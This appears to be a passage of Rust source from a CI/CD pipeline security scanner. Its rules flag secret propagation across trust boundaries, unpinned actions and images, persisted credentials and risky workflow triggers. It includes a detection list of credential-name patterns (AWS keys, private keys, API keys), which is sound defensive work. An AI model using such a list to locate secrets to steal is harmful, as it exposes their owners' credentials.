use crate::finding::{
Finding, FindingCategory, FindingExtras, FindingSource, Recommendation, Severity,
};
use crate::graph::{
is_docker_digest_pinned, is_sha_pinned, AuthorityCompleteness, AuthorityGraph, EdgeKind,
IdentityScope, NodeId, NodeKind, TrustZone, META_ADD_SPN_TO_ENV, META_ATTESTS, META_CACHE_KEY,
META_CHECKOUT_REF, META_CHECKOUT_SELF, META_CLI_FLAG_EXPOSED, META_CONTAINER, META_DIGEST,
META_DISPATCH_INPUTS, META_DOTENV_FILE, META_DOWNLOADS_ARTIFACT, META_ENVIRONMENT_NAME,
META_ENVIRONMENT_URL, META_ENV_APPROVAL, META_FORK_CHECK, META_GITLAB_ALLOW_FAILURE,
META_GITLAB_CACHE_KEY, META_GITLAB_CACHE_POLICY, META_GITLAB_DIND_SERVICE, META_GITLAB_EXTENDS,
META_GITLAB_INCLUDES, META_GITLAB_TRIGGER_KIND, META_IDENTITY_SCOPE, META_IMPLICIT,
META_INTERACTIVE_DEBUG, META_INTERPRETS_ARTIFACT, META_JOB_NAME, META_JOB_OUTPUTS, META_NEEDS,
META_NO_WORKFLOW_PERMISSIONS, META_OIDC, META_OIDC_AUDIENCE, META_PERMISSIONS, META_PLATFORM,
META_READS_ENV, META_REPOSITORIES, META_RULES_PROTECTED_ONLY, META_SCRIPT_BODY,
META_SECRETS_INHERIT, META_SELF_HOSTED, META_SERVICE_CONNECTION, META_SERVICE_CONNECTION_NAME,
META_TERRAFORM_AUTO_APPROVE, META_TRIGGER, META_TRIGGERS, META_VARIABLE_GROUP,
META_WRITES_ENV_GATE,
};
use crate::propagation;
fn cap_severity(severity: Severity, max_severity: Severity) -> Severity {
if severity < max_severity {
max_severity
} else {
severity
}
}
fn apply_confidence_cap(graph: &AuthorityGraph, findings: &mut [Finding]) {
if graph.completeness != AuthorityCompleteness::Partial {
return;
}
for finding in findings {
finding.severity = cap_severity(finding.severity, Severity::High);
}
}
/// MVP Rule 1: Authority (secret/identity) propagated across a trust boundary.
///
/// **Clustering (v0.9.x):** all paths from the same root authority node
/// (Secret/Identity) collapse into ONE finding per source. The single
/// finding carries every reached sink in `nodes_involved` — `[source,
/// sink_a, sink_b, ...]` — and lists them in the message. This matches
/// the SARIF fingerprint behaviour (which already collapses per
/// `root_authority_node_name`) and removes the alert-fatigue cliff seen
/// on the GHA corpus where one `GITHUB_TOKEN` could produce 8+ near-
/// identical findings as it propagated through a matrix workflow.
///
/// Severity graduation (per-path, then max-over-paths):
/// - Untrusted sink: Critical (real risk — unpinned code with authority)
/// - SHA-pinned ThirdParty sink: High (immutable code, but still cross-boundary)
/// - SHA-pinned sink + constrained identity: Medium (lowest-risk form — read-only
/// token to immutable third-party code, e.g. `contents:read` → `actions/checkout@sha`)
///
/// When every path in a cluster crosses an environment approval gate,
/// the cluster's severity is downgraded one step (mirroring the
/// per-path downgrade the previous emitter applied).
pub fn authority_propagation(graph: &AuthorityGraph, max_hops: usize) -> Vec<Finding> {
let paths = propagation::propagation_analysis(graph, max_hops);
// Group by root authority source node. We preserve insertion order so
// findings come out in the same order they would have under per-hop
// emission (callers and golden-file tests rely on the source-first
// ordering of authority_propagation findings).
let mut order: Vec<NodeId> = Vec::new();
let mut groups: std::collections::HashMap<NodeId, Vec<propagation::PropagationPath>> =
std::collections::HashMap::new();
for path in paths.into_iter().filter(|p| p.crossed_boundary) {
groups
.entry(path.source)
.or_insert_with(|| {
order.push(path.source);
Vec::new()
})
.push(path);
}
let mut findings = Vec::with_capacity(order.len());
for source_id in order {
let paths = match groups.remove(&source_id) {
Some(p) if !p.is_empty() => p,
_ => continue,
};
let source_name = graph
.node(source_id)
.map(|n| n.name.as_str())
.unwrap_or("?")
.to_string();
let source_is_constrained = graph
.node(source_id)
.and_then(|n| n.metadata.get(META_IDENTITY_SCOPE))
.map(|s| s == "constrained")
.unwrap_or(false);
let source_is_oidc = graph
.node(source_id)
.and_then(|n| n.metadata.get(META_OIDC))
.map(|v| v == "true")
.unwrap_or(false);
// Walk every path in the cluster and compute (severity, gated?,
// sink id, representative path) — the cluster takes the max
// severity (i.e. the worst sink wins). Severity is downgraded
// only when every path in the cluster crosses an env-approval
// gate; if even one path bypasses the gate, the cluster is not
// downgraded.
let mut worst_sev = Severity::Info;
let mut all_gated = true;
let mut best_path: Option<propagation::PropagationPath> = None;
let mut sink_ids: Vec<NodeId> = Vec::new();
let mut seen_sinks = std::collections::HashSet::new();
for path in &paths {
let sink_is_pinned = graph
.node(path.sink)
.map(|n| {
n.trust_zone == TrustZone::ThirdParty && n.metadata.contains_key(META_DIGEST)
})
.unwrap_or(false);
let base_severity = if sink_is_pinned && source_is_constrained && !source_is_oidc {
Severity::Medium
} else if sink_is_pinned && !source_is_oidc {
Severity::High
} else {
Severity::Critical
};
let gated = path_crosses_env_approval(graph, path);
let effective_severity = if gated {
downgrade_one_step(base_severity)
} else {
base_severity
};
if !gated {
all_gated = false;
}
if effective_severity < worst_sev {
worst_sev = effective_severity;
best_path = Some(path.clone());
}
if seen_sinks.insert(path.sink) {
sink_ids.push(path.sink);
}
}
// Build sink name list for the message. Truncate aggressively past
// ~5 names to avoid an unbounded message string on extreme inputs;
// the full set is still in `nodes_involved`.
let mut sink_names: Vec<String> = sink_ids
.iter()
.filter_map(|id| graph.node(*id).map(|n| n.name.clone()))
.collect();
let truncated = if sink_names.len() > 5 {
let extra = sink_names.len() - 5;
sink_names.truncate(5);
format!(", …+{extra} more")
} else {
String::new()
};
let sink_list = sink_names.join(", ");
let suffix = if all_gated && !paths.is_empty() {
" (mitigated: environment approval gate)"
} else {
""
};
let mut nodes_involved = Vec::with_capacity(sink_ids.len() + 1);
nodes_involved.push(source_id);
nodes_involved.extend(sink_ids.iter().copied());
let n = paths.len();
let unique_sinks = sink_ids.len();
let message = if unique_sinks == 1 {
format!("{source_name} propagated to {sink_list} across trust boundary{suffix}")
} else {
format!(
"{source_name} reaches {unique_sinks} sinks via authority propagation: [{sink_list}{truncated}]{suffix}"
)
};
let _ = n; // path count retained in the cluster's `path` field; not surfaced separately
findings.push(Finding {
severity: worst_sev,
category: FindingCategory::AuthorityPropagation,
nodes_involved,
message,
recommendation: Recommendation::TsafeRemediation {
command: "tsafe exec --ns <scoped-namespace> -- <command>".to_string(),
explanation: format!("Scope {source_name} to only the steps that need it"),
},
path: best_path,
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Returns true if any node touched by `path` (source, sink, or any edge
/// endpoint along the way) carries META_ENV_APPROVAL = "true".
fn path_crosses_env_approval(graph: &AuthorityGraph, path: &propagation::PropagationPath) -> bool {
let has_marker = |id: NodeId| {
graph
.node(id)
.and_then(|n| n.metadata.get(META_ENV_APPROVAL))
.map(|v| v == "true")
.unwrap_or(false)
};
if has_marker(path.source) || has_marker(path.sink) {
return true;
}
for &edge_id in &path.edges {
if let Some(edge) = graph.edge(edge_id) {
if has_marker(edge.from) || has_marker(edge.to) {
return true;
}
}
}
false
}
/// Reduce a severity by one step. Critical→High, High→Medium, Medium→Low.
/// Low and Info are already at the floor of meaningful reduction and are
/// returned unchanged.
fn downgrade_one_step(severity: Severity) -> Severity {
match severity {
Severity::Critical => Severity::High,
Severity::High => Severity::Medium,
Severity::Medium => Severity::Low,
Severity::Low => Severity::Low,
Severity::Info => Severity::Info,
}
}
/// MVP Rule 2: Identity scope broader than actual usage.
///
/// Uses `IdentityScope` classification from the precision layer. Broad and
/// Unknown scopes are flagged — Unknown is treated as risky because if we
/// can't determine the scope, we shouldn't assume it's safe.
pub fn over_privileged_identity(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for identity in graph.nodes_of_kind(NodeKind::Identity) {
let granted_scope = identity
.metadata
.get(META_PERMISSIONS)
.cloned()
.unwrap_or_default();
// Use IdentityScope from metadata if set by parser, otherwise classify from permissions
let scope = identity
.metadata
.get(META_IDENTITY_SCOPE)
.and_then(|s| match s.as_str() {
"broad" => Some(IdentityScope::Broad),
"constrained" => Some(IdentityScope::Constrained),
"unknown" => Some(IdentityScope::Unknown),
_ => None,
})
.unwrap_or_else(|| IdentityScope::from_permissions(&granted_scope));
// Broad or Unknown scope — flag it. Unknown is treated as risky.
let (should_flag, severity) = match scope {
IdentityScope::Broad => (true, Severity::High),
IdentityScope::Unknown => (true, Severity::Medium),
IdentityScope::Constrained => (false, Severity::Info),
};
if !should_flag {
continue;
}
let accessor_steps: Vec<_> = graph
.edges_to(identity.id)
.filter(|e| e.kind == EdgeKind::HasAccessTo)
.filter_map(|e| graph.node(e.from))
.collect();
if !accessor_steps.is_empty() {
let scope_label = match scope {
IdentityScope::Broad => "broad",
IdentityScope::Unknown => "unknown (treat as risky)",
IdentityScope::Constrained => "constrained",
};
findings.push(Finding {
severity,
category: FindingCategory::OverPrivilegedIdentity,
path: None,
nodes_involved: std::iter::once(identity.id)
.chain(accessor_steps.iter().map(|n| n.id))
.collect(),
message: format!(
"{} has {} scope (permissions: '{}') — likely broader than needed",
identity.name, scope_label, granted_scope
),
recommendation: Recommendation::ReducePermissions {
current: granted_scope.clone(),
minimum: "{ contents: read }".into(),
},
source: FindingSource::BuiltIn,
// Working out the minimum-needed scope across N jobs is a
// ~1 hour audit, not a flag flip — Small.
extras: FindingExtras {
time_to_fix: Some(crate::finding::FixEffort::Small),
..FindingExtras::default()
},
});
}
}
findings
}
/// MVP Rule 3: Third-party action/image without SHA pin.
///
/// **Severity tiering (v0.9.x):** the rule used to fire at a single severity
/// regardless of which action was unpinned, which produced uniform noise on
/// monorepo CI files where the action owner determined the actual risk.
/// The blue-team corpus report (`MEMORY/.../blueteam-corpus-defense.md`)
/// recommended splitting:
/// * Same-repo composite action (`./.github/actions/*`) → **Info**.
/// The action lives in the consumer's own repo — there's no external
/// supply-chain surface; pinning is a hygiene preference, not a
/// control gap.
/// * Owner is a well-known first-party org (`actions/*`, `github/*`,
/// `actions-rs/*`, `docker/*`) → **Medium**. These are GitHub-org or
/// adjacent tooling maintainers; the supply-chain surface exists but
/// is operationally narrow and well-monitored.
/// * Anything else (`random-org/foo@v1`, etc.) → **High**. Unbounded
/// supply-chain risk — this is the case the rule was originally
/// designed for.
///
/// Deduplicates by action reference — the same action used in multiple jobs
/// produces multiple Image nodes but should only be flagged once.
pub fn unpinned_action(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
let mut seen = std::collections::HashSet::new();
for image in graph.nodes_of_kind(NodeKind::Image) {
// Container images are handled by floating_image — skip here to avoid
// double-flagging the same node as both UnpinnedAction and FloatingImage.
if image
.metadata
.get(META_CONTAINER)
.map(|v| v == "true")
.unwrap_or(false)
{
continue;
}
// Self-hosted runner labels live in the FirstParty zone but aren't
// an action reference — they have no `@version` to pin and the rule
// would otherwise flag every `runs-on: self-hosted` line.
if image
.metadata
.get(META_SELF_HOSTED)
.map(|v| v == "true")
.unwrap_or(false)
{
continue;
}
// Same-repo composite actions (`./.github/actions/foo`) sit in the
// FirstParty zone. Other FirstParty Image nodes (e.g. self-hosted
// pool labels, hosted runner names) are not flaggable references —
// we admit FirstParty into the severity ladder ONLY when the name
// is the relative-path form, and emit Info for it.
let is_local_composite = image.name.starts_with("./");
if image.trust_zone == TrustZone::FirstParty && !is_local_composite {
continue;
}
// Deduplicate: same action reference flagged once
if !seen.insert(&image.name) {
continue;
}
let has_digest = image.metadata.contains_key(META_DIGEST);
if has_digest || is_sha_pinned(&image.name) {
continue;
}
// Tier severity by owner. `is_local_composite` already handled the
// same-repo case; for everything else, look at the `<owner>/...`
// prefix and decide first-party vs unknown supplier.
let severity = if is_local_composite {
Severity::Info
} else if is_well_known_first_party_action(&image.name) {
Severity::Medium
} else {
Severity::High
};
findings.push(Finding {
severity,
category: FindingCategory::UnpinnedAction,
path: None,
nodes_involved: vec![image.id],
message: format!("{} is not pinned to a SHA digest", image.name),
recommendation: Recommendation::PinAction {
current: image.name.clone(),
pinned: format!(
"{}@<sha256-digest>",
image.name.split('@').next().unwrap_or(&image.name)
),
},
source: FindingSource::BuiltIn,
// Mechanical fix: replace `@v3` with `@<40-char-sha>`. ~5 min.
extras: FindingExtras {
time_to_fix: Some(crate::finding::FixEffort::Trivial),
..FindingExtras::default()
},
});
}
findings
}
/// Owners we treat as well-known first-party for the purpose of severity
/// tiering. The list is intentionally short and conservative — adding an
/// org here downgrades every unpinned action it ships, so the bar is
/// "GitHub-maintained or directly adjacent core tooling." Anything else
/// stays at the High default.
fn is_well_known_first_party_action(uses: &str) -> bool {
// Strip an optional `@<ref>` suffix, then take the leading owner segment.
let bare = uses.split('@').next().unwrap_or(uses);
let owner = bare.split('/').next().unwrap_or("");
matches!(owner, "actions" | "github" | "actions-rs" | "docker")
}
/// MVP Rule 4: Untrusted step has direct access to secret/identity.
pub fn untrusted_with_authority(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for step in graph.nodes_in_zone(TrustZone::Untrusted) {
if step.kind != NodeKind::Step {
continue;
}
// Check if this untrusted step directly accesses any authority source
for edge in graph.edges_from(step.id) {
if edge.kind != EdgeKind::HasAccessTo {
continue;
}
if let Some(target) = graph.node(edge.to) {
if matches!(target.kind, NodeKind::Secret | NodeKind::Identity) {
let cli_flag_exposed = target
.metadata
.get(META_CLI_FLAG_EXPOSED)
.map(|v| v == "true")
.unwrap_or(false);
// Platform-implicit tokens (e.g. ADO System.AccessToken) are structurally
// accessible to all tasks by design. Flag at Info — real but not actionable
// as a misconfiguration. Explicit secrets/service connections stay Critical.
let is_implicit = target
.metadata
.get(META_IMPLICIT)
.map(|v| v == "true")
.unwrap_or(false);
let recommendation = if target.kind == NodeKind::Secret {
if cli_flag_exposed {
Recommendation::Manual {
action: format!(
"Move '{}' from -var flag to TF_VAR_{} env var — \
-var values appear in pipeline logs and Terraform plan output",
target.name, target.name
),
}
} else {
Recommendation::CellosRemediation {
reason: format!(
"Untrusted step '{}' has direct access to secret '{}'",
step.name, target.name
),
spec_hint: format!(
"cellos run --network deny-all --broker env:{}",
target.name
),
}
}
} else {
// Identity branch — for implicit platform tokens, add a CellOS
// compensating-control note since the token cannot be un-injected
// at the platform layer.
let minimum = if is_implicit {
"minimal required scope — or use CellOS deny-all egress as a compensating control to limit exfiltration of the injected token".into()
} else {
"minimal required scope".into()
};
Recommendation::ReducePermissions {
current: target
.metadata
.get(META_PERMISSIONS)
.cloned()
.unwrap_or_else(|| "unknown".into()),
minimum,
}
};
let log_exposure_note = if cli_flag_exposed {
" (passed as -var flag — value visible in pipeline logs)"
} else {
""
};
let (severity, message) =
if is_implicit {
(
Severity::Info,
format!(
"Untrusted step '{}' has structural access to implicit {} '{}' \
(platform-injected — all tasks receive this token by design){}",
step.name,
if target.kind == NodeKind::Secret { "secret" } else { "identity" },
target.name,
log_exposure_note,
),
)
} else {
(
Severity::Critical,
format!(
"Untrusted step '{}' has direct access to {} '{}'{}",
step.name,
if target.kind == NodeKind::Secret {
"secret"
} else {
"identity"
},
target.name,
log_exposure_note,
),
)
};
findings.push(Finding {
severity,
category: FindingCategory::UntrustedWithAuthority,
path: None,
nodes_involved: vec![step.id, target.id],
message,
recommendation,
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
}
}
}
findings
}
/// MVP Rule 5: Artifact produced by privileged step consumed across trust boundary.
pub fn artifact_boundary_crossing(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for artifact in graph.nodes_of_kind(NodeKind::Artifact) {
// Find producer(s)
let producers: Vec<_> = graph
.edges_to(artifact.id)
.filter(|e| e.kind == EdgeKind::Produces)
.filter_map(|e| graph.node(e.from))
.collect();
// Find consumer(s) — Consumes edges go artifact -> step
let consumers: Vec<_> = graph
.edges_from(artifact.id)
.filter(|e| e.kind == EdgeKind::Consumes)
.filter_map(|e| graph.node(e.to))
.collect();
for producer in &producers {
// Only care if the producer is privileged (has access to secrets/identities)
let producer_has_authority = graph.edges_from(producer.id).any(|e| {
e.kind == EdgeKind::HasAccessTo
&& graph
.node(e.to)
.map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
.unwrap_or(false)
});
if !producer_has_authority {
continue;
}
for consumer in &consumers {
if consumer.trust_zone.is_lower_than(&producer.trust_zone) {
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::ArtifactBoundaryCrossing,
path: None,
nodes_involved: vec![producer.id, artifact.id, consumer.id],
message: format!(
"Artifact '{}' produced by privileged step '{}' consumed by '{}' ({:?} -> {:?})",
artifact.name,
producer.name,
consumer.name,
producer.trust_zone,
consumer.trust_zone
),
recommendation: Recommendation::TsafeRemediation {
command: format!(
"tsafe exec --ns {} -- <build-command>",
producer.name
),
explanation: format!(
"Scope secrets to '{}' only; artifact '{}' should not carry authority",
producer.name, artifact.name
),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
}
}
}
findings
}
/// Stretch Rule 9: Secret name matches known long-lived/static credential pattern.
///
/// Heuristic: secrets named like AWS keys, API keys, passwords, or private keys
/// are likely static credentials that should be replaced with OIDC federation.
pub fn long_lived_credential(graph: &AuthorityGraph) -> Vec<Finding> {
const STATIC_PATTERNS: &[&str] = &[
"AWS_ACCESS_KEY",
"AWS_SECRET_ACCESS_KEY",
"_API_KEY",
"_APIKEY",
"_PASSWORD",
"_PASSWD",
"_PRIVATE_KEY",
"_SECRET_KEY",
"_SERVICE_ACCOUNT",
"_SIGNING_KEY",
];
let mut findings = Vec::new();
for secret in graph.nodes_of_kind(NodeKind::Secret) {
let upper = secret.name.to_uppercase();
let is_static = STATIC_PATTERNS.iter().any(|p| upper.contains(p));
if is_static {
findings.push(Finding {
severity: Severity::Low,
category: FindingCategory::LongLivedCredential,
path: None,
nodes_involved: vec![secret.id],
message: format!(
"'{}' looks like a long-lived static credential",
secret.name
),
recommendation: Recommendation::FederateIdentity {
static_secret: secret.name.clone(),
oidc_provider: "GitHub Actions OIDC (id-token: write)".into(),
},
source: FindingSource::BuiltIn,
// Migrating from PATs to OIDC across an org touches identity
// policy, IAM trust relationships, and every downstream
// consumer of the credential — Large effort.
extras: FindingExtras {
time_to_fix: Some(crate::finding::FixEffort::Large),
..FindingExtras::default()
},
});
}
}
findings
}
/// Tier 6 Rule: Container image without Docker digest pinning.
///
/// Job-level containers marked with `META_CONTAINER` that aren't pinned to
/// `image@sha256:<64hex>` can be silently mutated between runs. Deduplicates
/// by image name (same image in multiple jobs flags once).
pub fn floating_image(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
let mut seen = std::collections::HashSet::new();
for image in graph.nodes_of_kind(NodeKind::Image) {
let is_container = image
.metadata
.get(META_CONTAINER)
.map(|v| v == "true")
.unwrap_or(false);
if !is_container {
continue;
}
if !seen.insert(image.name.as_str()) {
continue;
}
if !is_docker_digest_pinned(&image.name) {
findings.push(Finding {
severity: Severity::Medium,
category: FindingCategory::FloatingImage,
path: None,
nodes_involved: vec![image.id],
message: format!("Container image '{}' is not pinned to a digest", image.name),
recommendation: Recommendation::PinAction {
current: image.name.clone(),
pinned: format!(
"{}@sha256:<digest>",
image.name.split(':').next().unwrap_or(&image.name)
),
},
source: FindingSource::BuiltIn,
// `docker pull <image>` once and append `@sha256:<digest>` —
// identical mechanical fix to unpinned_action. Trivial.
extras: FindingExtras {
time_to_fix: Some(crate::finding::FixEffort::Trivial),
..FindingExtras::default()
},
});
}
}
findings
}
/// Stretch Rule: checkout step with `persistCredentials: true` writes credentials to disk.
///
/// The PersistsTo edge connects a checkout step to the token it persists. Disk-resident
/// credentials are accessible to all subsequent steps (and to any process with filesystem
/// access), unlike runtime-only HasAccessTo authority which expires when the step exits.
pub fn persisted_credential(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for edge in &graph.edges {
if edge.kind != EdgeKind::PersistsTo {
continue;
}
let Some(step) = graph.node(edge.from) else {
continue;
};
let Some(target) = graph.node(edge.to) else {
continue;
};
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::PersistedCredential,
path: None,
nodes_involved: vec![step.id, target.id],
message: format!(
"'{}' persists '{}' to disk via persistCredentials: true — \
credential remains in .git/config and is accessible to all subsequent steps",
step.name, target.name
),
recommendation: Recommendation::Manual {
action: "Remove persistCredentials: true from the checkout step. \
Pass credentials explicitly only to steps that need them."
.into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Rule: dangerous trigger type (pull_request_target / pr) combined with secret/identity access.
///
/// Fires once per workflow when the graph-level `META_TRIGGER` indicates a high-risk
/// trigger and at least one step holds authority. Aggregates all involved nodes.
pub fn trigger_context_mismatch(graph: &AuthorityGraph) -> Vec<Finding> {
let trigger = match graph.metadata.get(META_TRIGGER) {
Some(t) => t.clone(),
None => return Vec::new(),
};
let severity = match trigger.as_str() {
"pull_request_target" => Severity::Critical,
"pr" => Severity::High,
_ => return Vec::new(),
};
// Collect steps that hold authority (HasAccessTo a Secret or Identity)
let mut steps_with_authority: Vec<NodeId> = Vec::new();
let mut authority_targets: Vec<NodeId> = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let mut step_holds_authority = false;
for edge in graph.edges_from(step.id) {
if edge.kind != EdgeKind::HasAccessTo {
continue;
}
if let Some(target) = graph.node(edge.to) {
if matches!(target.kind, NodeKind::Secret | NodeKind::Identity) {
step_holds_authority = true;
if !authority_targets.contains(&target.id) {
authority_targets.push(target.id);
}
}
}
}
if step_holds_authority {
steps_with_authority.push(step.id);
}
}
if steps_with_authority.is_empty() {
return Vec::new();
}
let n = steps_with_authority.len();
let mut nodes_involved = steps_with_authority.clone();
nodes_involved.extend(authority_targets);
vec![Finding {
severity,
category: FindingCategory::TriggerContextMismatch,
path: None,
nodes_involved,
message: format!(
"Workflow triggered by {trigger} with secret/identity access — {n} step(s) hold authority that attacker-controlled code could reach"
),
recommendation: Recommendation::Manual {
action: "Use a separate workflow triggered by workflow_run (not pull_request_target) for privileged operations, or ensure no checkout of the PR head ref occurs before secret use".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
}]
}
/// Rule: authority (secret/identity) flows into an opaque external workflow via DelegatesTo.
///
/// For each Step node: find all `DelegatesTo` edges to Image nodes where the trust zone
/// is not FirstParty. If the same step also has `HasAccessTo` any Secret or Identity,
/// emit one finding per delegation edge.
pub fn cross_workflow_authority_chain(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
// Collect authority sources this step holds
let authority_nodes: Vec<&_> = graph
.edges_from(step.id)
.filter(|e| e.kind == EdgeKind::HasAccessTo)
.filter_map(|e| graph.node(e.to))
.filter(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
.collect();
if authority_nodes.is_empty() {
continue;
}
// Find each DelegatesTo edge to a non-FirstParty Image
for edge in graph.edges_from(step.id) {
if edge.kind != EdgeKind::DelegatesTo {
continue;
}
let Some(target) = graph.node(edge.to) else {
continue;
};
if target.kind != NodeKind::Image {
continue;
}
if target.trust_zone == TrustZone::FirstParty {
continue;
}
let severity = match target.trust_zone {
TrustZone::Untrusted => Severity::Critical,
TrustZone::ThirdParty => Severity::High,
TrustZone::FirstParty => continue,
};
let authority_names: Vec<String> =
authority_nodes.iter().map(|n| n.name.clone()).collect();
let authority_label = authority_names.join(", ");
let mut nodes_involved = vec![step.id, target.id];
nodes_involved.extend(authority_nodes.iter().map(|n| n.id));
findings.push(Finding {
severity,
category: FindingCategory::CrossWorkflowAuthorityChain,
path: None,
nodes_involved,
message: format!(
"'{}' delegates to '{}' ({:?}) while holding authority ({}) — authority chain extends into opaque external workflow",
step.name, target.name, target.trust_zone, authority_label
),
recommendation: Recommendation::Manual {
action: format!(
"Pin '{}' to a full SHA digest; audit what authority the called workflow receives",
target.name
),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
}
findings
}
/// Rule: circular DelegatesTo chain — workflow calls itself transitively.
///
/// Iterative DFS over `DelegatesTo` edges. Detects back edges (gray → gray) and
/// collects all nodes that participate in any cycle. If any cycles exist, emits
/// a single High-severity finding listing all cycle members.
pub fn authority_cycle(graph: &AuthorityGraph) -> Vec<Finding> {
let n = graph.nodes.len();
if n == 0 {
return Vec::new();
}
// Pre-build adjacency list for DelegatesTo edges only.
let mut delegates_to: Vec<Vec<NodeId>> = vec![Vec::new(); n];
for edge in &graph.edges {
if edge.kind == EdgeKind::DelegatesTo && edge.from < n && edge.to < n {
delegates_to[edge.from].push(edge.to);
}
}
let mut color: Vec<u8> = vec![0u8; n]; // 0=white, 1=gray, 2=black
let mut cycle_nodes: std::collections::BTreeSet<NodeId> = std::collections::BTreeSet::new();
for start in 0..n {
if color[start] != 0 {
continue;
}
color[start] = 1;
let mut stack: Vec<(NodeId, usize)> = vec![(start, 0)];
loop {
let len = stack.len();
if len == 0 {
break;
}
let (node_id, edge_idx) = stack[len - 1];
if edge_idx < delegates_to[node_id].len() {
stack[len - 1].1 += 1;
let neighbor = delegates_to[node_id][edge_idx];
if color[neighbor] == 1 {
// Back edge: cycle found. Collect every node between `neighbor`
// (the cycle start) and `node_id` (the cycle end) along the
// current DFS stack. All stack entries are gray by construction,
// so we walk the stack from `neighbor` to the top.
let cycle_start_idx =
stack.iter().position(|&(n, _)| n == neighbor).unwrap_or(0);
for &(n, _) in &stack[cycle_start_idx..] {
cycle_nodes.insert(n);
}
} else if color[neighbor] == 0 {
color[neighbor] = 1;
stack.push((neighbor, 0));
}
} else {
color[node_id] = 2;
stack.pop();
}
}
}
if cycle_nodes.is_empty() {
return Vec::new();
}
vec![Finding {
severity: Severity::High,
category: FindingCategory::AuthorityCycle,
path: None,
nodes_involved: cycle_nodes.into_iter().collect(),
message:
"Circular delegation detected — workflow calls itself transitively, creating unbounded privilege escalation paths"
.into(),
recommendation: Recommendation::Manual {
action: "Break the delegation cycle — a workflow must not directly or transitively call itself".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
}]
}
/// Rule: privileged workflow (OIDC/federated identity) with no provenance attestation step.
///
/// Scoped to workflows that actually use OIDC/federated identity (an Identity node with
/// `META_OIDC = "true"` is present). If no node in the graph has `META_ATTESTS = "true"`,
/// emit one Info-severity finding listing the steps with HasAccessTo an OIDC identity.
pub fn uplift_without_attestation(graph: &AuthorityGraph) -> Vec<Finding> {
// Scope: only fire when the graph has at least one OIDC-capable Identity
let oidc_identity_ids: Vec<NodeId> = graph
.nodes_of_kind(NodeKind::Identity)
.filter(|n| {
n.metadata
.get(META_OIDC)
.map(|v| v == "true")
.unwrap_or(false)
})
.map(|n| n.id)
.collect();
if oidc_identity_ids.is_empty() {
return Vec::new();
}
// Bail if any node already has META_ATTESTS = true
let has_attestation = graph.nodes.iter().any(|n| {
n.metadata
.get(META_ATTESTS)
.map(|v| v == "true")
.unwrap_or(false)
});
if has_attestation {
return Vec::new();
}
// Collect steps that have HasAccessTo an OIDC identity
let mut steps_using_oidc: Vec<NodeId> = Vec::new();
for edge in &graph.edges {
if edge.kind != EdgeKind::HasAccessTo {
continue;
}
if oidc_identity_ids.contains(&edge.to) && !steps_using_oidc.contains(&edge.from) {
steps_using_oidc.push(edge.from);
}
}
if steps_using_oidc.is_empty() {
return Vec::new();
}
let n = steps_using_oidc.len();
let mut nodes_involved = steps_using_oidc.clone();
nodes_involved.extend(oidc_identity_ids);
vec![Finding {
severity: Severity::Info,
category: FindingCategory::UpliftWithoutAttestation,
path: None,
nodes_involved,
message: format!(
"{n} step(s) use OIDC/federated identity but no provenance attestation step was detected — artifact integrity cannot be verified"
),
recommendation: Recommendation::Manual {
action: "Add 'actions/attest-build-provenance' after your build step (GHA) to provide SLSA provenance. See https://docs.github.com/en/actions/security-guides/using-artifact-attestations".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
}]
}
/// Rule: step writes to the environment gate ($GITHUB_ENV / ##vso[task.setvariable]).
///
/// Authority leaking through the environment gate propagates to subsequent steps
/// outside the explicit graph edges. Severity:
/// - Untrusted step: Critical (attacker-controlled values inject into pipeline env)
/// - Step with secret/identity access: High (secrets may leak into env)
/// - Otherwise: Medium (still a propagation risk)
pub fn self_mutating_pipeline(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let writes_gate = step
.metadata
.get(META_WRITES_ENV_GATE)
.map(|v| v == "true")
.unwrap_or(false);
if !writes_gate {
continue;
}
// Collect authority targets the step has HasAccessTo
let authority_nodes: Vec<&_> = graph
.edges_from(step.id)
.filter(|e| e.kind == EdgeKind::HasAccessTo)
.filter_map(|e| graph.node(e.to))
.filter(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
.collect();
let is_untrusted = step.trust_zone == TrustZone::Untrusted;
let has_authority = !authority_nodes.is_empty();
let severity = if is_untrusted {
Severity::Critical
} else if has_authority {
Severity::High
} else {
Severity::Medium
};
let mut nodes_involved = vec![step.id];
nodes_involved.extend(authority_nodes.iter().map(|n| n.id));
let message = if is_untrusted {
format!(
"Untrusted step '{}' writes to the environment gate — attacker-controlled values can inject into subsequent steps' environment",
step.name
)
} else if has_authority {
let authority_label: Vec<String> =
authority_nodes.iter().map(|n| n.name.clone()).collect();
format!(
"Step '{}' writes to the environment gate while holding authority ({}) — secrets may leak into pipeline environment",
step.name,
authority_label.join(", ")
)
} else {
format!(
"Step '{}' writes to the environment gate — values can propagate into subsequent steps' environment",
step.name
)
};
findings.push(Finding {
severity,
category: FindingCategory::SelfMutatingPipeline,
path: None,
nodes_involved,
message,
recommendation: Recommendation::Manual {
action: "Avoid writing secrets or attacker-controlled values to $GITHUB_ENV / $GITHUB_PATH / pipeline variables. Use explicit step outputs with narrow scoping instead.".into(),
},
